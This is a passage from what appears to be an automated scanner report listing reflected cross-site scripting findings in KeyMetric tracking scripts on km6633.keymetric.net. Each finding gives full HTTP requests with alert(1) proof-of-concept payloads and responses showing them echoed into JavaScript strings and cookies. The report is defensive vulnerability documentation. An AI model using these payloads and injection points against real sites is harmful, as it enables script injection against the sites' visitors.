X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5119

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
':
val = '0'; break;
case 'cpca':
val = 'Campaign not provided'; break;
case 'kmca':
val = 'Campaign not provided'; break;
case 'cpag':
val = 'c9592';alert(1)//4b331517d4'; break;
case 'kmag':
val = 'c9592';alert(1)//4b331517d4'; break;
case 'kw':
val = 'Raw Query not available'; break;
case 'kmkw':
val = 'Raw Query not a
...[SNIP]...

3.276. http://km6633.keymetric.net/KM2.js [las parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the las request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e66b'%3balert(1)//0808889a259 was submitted in the las parameter. This input was echoed as 9e66b';alert(1)//0808889a259 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=09e66b'%3balert(1)//0808889a259&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=1833889000-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:12:52 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5117

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
5247,;expires=' + kmExt.toGMTString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
kmLat = new Date();
kmLat.setTime(kmLat.getTime() + 1000 * 60 * 60 * 24 * kmCookieDays);
document.cookie = 'kmL6633=1|09e66b';alert(1)//0808889a259|Campaign not provided|AdGroup not provided|Keyword not provided|unk|Referrer information not available|Raw Query not available;expires=' + kmLat.toGMTString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
...[SNIP]...

3.277. http://km6633.keymetric.net/KM2.js [lc1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lc1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f404'%3balert(1)//66f85e6c9f9 was submitted in the lc1 parameter. This input was echoed as 7f404';alert(1)//66f85e6c9f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=1833889000-17f404'%3balert(1)//66f85e6c9f9&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:13:45 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5154

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
'unk'; break;
case 'kmrq':
val = 'Raw Query not available'; break;
case 'kmrq':
val = 'Raw Query not available'; break;
case 'kmc1':
val = '1833889000-17f404';alert(1)//66f85e6c9f9'; break;
case 'kmc1':
val = '1833889000-17f404';alert(1)//66f85e6c9f9'; break;
case 'kmc2':
val = 'N/A'; break;
case 'kmc2':
val = 'N/A'; break;
c
...[SNIP]...

3.278. http://km6633.keymetric.net/KM2.js [lc2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lc2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce502'%3balert(1)//1302b0e5ca5 was submitted in the lc2 parameter. This input was echoed as ce502';alert(1)//1302b0e5ca5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=1833889000-1&lc2=ce502'%3balert(1)//1302b0e5ca5&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:13:52 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5148

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
val = 'Raw Query not available'; break;
case 'kmc1':
val = '1833889000-1'; break;
case 'kmc1':
val = '1833889000-1'; break;
case 'kmc2':
val = 'ce502';alert(1)//1302b0e5ca5'; break;
case 'kmc2':
val = 'ce502';alert(1)//1302b0e5ca5'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc4':
...[SNIP]...

3.279. http://km6633.keymetric.net/KM2.js [lc3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lc3 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47eca'%3balert(1)//e9854004d58 was submitted in the lc3 parameter. This input was echoed as 47eca';alert(1)//e9854004d58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=1833889000-1&lc2=&lc3=47eca'%3balert(1)//e9854004d58&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:13:59 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5148

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
; break;
case 'kmc1':
val = '1833889000-1'; break;
case 'kmc2':
val = 'N/A'; break;
case 'kmc2':
val = 'N/A'; break;
case 'kmc3':
val = '47eca';alert(1)//e9854004d58'; break;
case 'kmc3':
val = '47eca';alert(1)//e9854004d58'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc5':
...[SNIP]...

3.280. http://km6633.keymetric.net/KM2.js [lc4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lc4 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98ec5'%3balert(1)//49abfb9ed59 was submitted in the lc4 parameter. This input was echoed as 98ec5';alert(1)//49abfb9ed59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=1833889000-1&lc2=&lc3=&lc4=98ec5'%3balert(1)//49abfb9ed59&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:14:06 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5148

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
l = 'N/A'; break;
case 'kmc2':
val = 'N/A'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc4':
val = '98ec5';alert(1)//49abfb9ed59'; break;
case 'kmc4':
val = '98ec5';alert(1)//49abfb9ed59'; break;
case 'kmc5':
val = 'N/A'; break;
case 'kmc5':
val = 'N/A'; break;
case 'kmrd':
...[SNIP]...

3.281. http://km6633.keymetric.net/KM2.js [lc5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lc5 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79f9e'%3balert(1)//b16bb549e8 was submitted in the lc5 parameter. This input was echoed as 79f9e';alert(1)//b16bb549e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=1833889000-1&lc2=&lc3=&lc4=&lc5=79f9e'%3balert(1)//b16bb549e8&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:14:14 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5146

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
l = 'N/A'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc5':
val = '79f9e';alert(1)//b16bb549e8'; break;
case 'kmc5':
val = '79f9e';alert(1)//b16bb549e8'; break;
case 'kmrd':
val = 'Referrer information not available'; break;
case 'newvisit':
val =
...[SNIP]...

3.282. http://km6633.keymetric.net/KM2.js [lca parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lca request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bdc7'%3balert(1)//fcb9531e7e0 was submitted in the lca parameter. This input was echoed as 7bdc7';alert(1)//fcb9531e7e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=7bdc7'%3balert(1)//fcb9531e7e0&lag=&lc1=1833889000-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:13:30 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5119

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case 'kmas':
val = '0'; break;
case 'cpca':
val = '7bdc7';alert(1)//fcb9531e7e0'; break;
case 'kmca':
val = '7bdc7';alert(1)//fcb9531e7e0'; break;
case 'cpag':
val = 'AdGroup not provided'; break;
case 'kmag':
val = 'AdGroup not pro
...[SNIP]...

3.283. http://km6633.keymetric.net/KM2.js [lmt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lmt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bcc72'%3balert(1)//8a144b00b49 was submitted in the lmt parameter. This input was echoed as bcc72';alert(1)//8a144b00b49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=bcc72'%3balert(1)//8a144b00b49&rho=&rqu=&rqs=&lca=&lag=&lc1=1833889000-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:13:04 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5173

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
dGroup not provided'; break;
case 'kw':
val = 'Raw Query not available'; break;
case 'kmkw':
val = 'Raw Query not available'; break;
case 'kmmt':
val = 'bcc72';alert(1)//8a144b00b49'; break;
case 'kmmt':
val = 'bcc72';alert(1)//8a144b00b49'; break;
case 'kmrq':
val = 'Raw Query not available'; break;
case 'kmrq':
val = 'Raw Query no
...[SNIP]...

3.284. http://km6633.keymetric.net/KM2.js [rho parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the rho request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 947b1'%3balert(1)//261c1b264d4 was submitted in the rho parameter. This input was echoed as 947b1';alert(1)//261c1b264d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=947b1'%3balert(1)//261c1b264d4&rqu=&rqs=&lca=&lag=&lc1=1833889000-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:13:11 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5086

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
l = 'N/A'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc5':
val = 'N/A'; break;
case 'kmc5':
val = 'N/A'; break;
case 'kmrd':
val = '947b1';alert(1)//261c1b264d4'; break;
case 'newvisit':
val = 'true'; break;
default:
val = 'undefined';
}
return val;
}
var km_Acct = '6633';
var cbd = km_GBD(window.location.hostname);
cbd
...[SNIP]...

3.285. http://km6633.keymetric.net/KM2.js [rqu parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the rqu request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65450'%3balert(1)//dc7176d7fd3 was submitted in the rqu parameter. This input was echoed as 65450';alert(1)//dc7176d7fd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=65450'%3balert(1)//dc7176d7fd3&rqs=&lca=&lag=&lc1=1833889000-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:13:18 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5128

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
= 'Campaign not provided'; break;
case 'cpag':
val = 'AdGroup not provided'; break;
case 'kmag':
val = 'AdGroup not provided'; break;
case 'kw':
val = '65450';alert(1)//dc7176d7fd3'; break;
case 'kmkw':
val = '65450';alert(1)//dc7176d7fd3'; break;
case 'kmmt':
val = 'unk'; break;
case 'kmmt':
val = 'unk'; break;
case 'kmrq':
...[SNIP]...

3.286. http://km6633.keymetric.net/KM2.js [vid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the vid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f006'%3balert(1)//ad02c86a733 was submitted in the vid parameter. This input was echoed as 6f006';alert(1)//ad02c86a733 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=6f006'%3balert(1)//ad02c86a733&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=1833889000-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:12:39 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5090

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
= km_GBD(window.location.hostname);
cbd = ((cbd=='localhost')?'':cbd);
kmSessionDur = 30;
kmSes = new Date();
kmSes.setTime(kmSes.getTime() + 1000 * 60 * kmSessionDur);
document.cookie = 'kmS6633=6f006';alert(1)//ad02c86a733;expires=' + kmSes.toGMTString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
kmCookieDays = 365;
kmExt = new Date();
kmExt.setTime(kmExt.getTime() + 1000 * 60 * 60 * 24 * kmCookieDays);
document.cooki
...[SNIP]...

3.287. http://km6633.keymetric.net/KMGCnew.js [disp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KMGCnew.js

Issue detail

The value of the disp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb907'%3balert(1)//67c803c981b was submitted in the disp parameter. This input was echoed as eb907';alert(1)//67c803c981b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KMGCnew.js?mod=auto&cat=0&cbk=&tgt=&pat=888-793-4999&disp=%23%23%23-%23%23%23-%23%23%23%23eb907'%3balert(1)//67c803c981b&ctype=1&rnd=0.526470772922039&vid=8724330e5e1e4e0c9955f42eddb6ccbb HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:12:19 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 80

km_r(document.body,'888-793-4999','877-883-7738eb907';alert(1)//67c803c981b');

3.288. http://km6633.keymetric.net/KMGCnew.js [pat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KMGCnew.js

Issue detail

The value of the pat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d727'-alert(1)-'0a43435fc7f was submitted in the pat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KMGCnew.js?mod=auto&cat=0&cbk=&tgt=&pat=888-793-49997d727'-alert(1)-'0a43435fc7f&disp=%23%23%23-%23%23%23-%23%23%23%23&ctype=1&rnd=0.526470772922039&vid=8724330e5e1e4e0c9955f42eddb6ccbb HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
